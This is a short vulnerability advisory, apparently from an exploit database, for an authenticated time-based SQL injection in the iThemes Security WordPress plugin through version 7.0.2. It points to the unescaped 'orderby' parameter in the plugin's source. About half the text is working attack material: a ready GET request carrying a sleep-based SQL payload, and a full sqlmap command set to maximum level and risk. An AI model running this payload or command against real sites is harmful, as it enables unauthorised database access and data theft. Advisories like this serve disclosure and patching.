iThemes Security <= 7.0.2 - Authenticated SQL Injection

2018-06-2200:00:00

Çlirim Emini

0.925 High

EPSS

Percentile

99.0%

JSON

The iThemes Security (better-wp-security) plugin before 7.0.3 for WordPress allows SQL Injection (by attackers with Admin privileges) via the logs page. Vulnerability description: iThemes Security appears to be vulnerable to time-based SQL-Injection. Parameter orderby is vulnerable because backend variable $sort_by_column is not escaped. Privileges required: Admin user. Technical details: File: better-wp-security/core/admin-pages/logs-list-table.php Line 271: if ( isset( $_GET[' orderby '], $_GET[‘order’] ) ) { Line 272: $ sort_by_column = $_GET[' orderby ']; File: better-wp-security/core/lib/log-util.php Line 168: $query .= ’ ORDER BY ’ . implode( ', ', $ sort_by_column ));

The following GET request will cause the SQL query to execute and sleep for 10 seconds if clicked on as an authenticated admin:

http://localhost/wordpress/wp-admin/admin.php?page=itsec-logs&filter=malware&orderby=remote_ip%2c(select*from(select(sleep(10)))a)&order=asc&paged=0

Using SQLMAP:

sqlmap -u 'http://localhost/wp-admin/admin.php?page=itsec-logs&filter=malware&orderby=remote_ip*&order=asc&paged=0' --cookie "wordpress_b...; wordpress_logged_in_bbf...;" --string "WordPress" --dbms=MySQL --technique T --level 5 --risk 3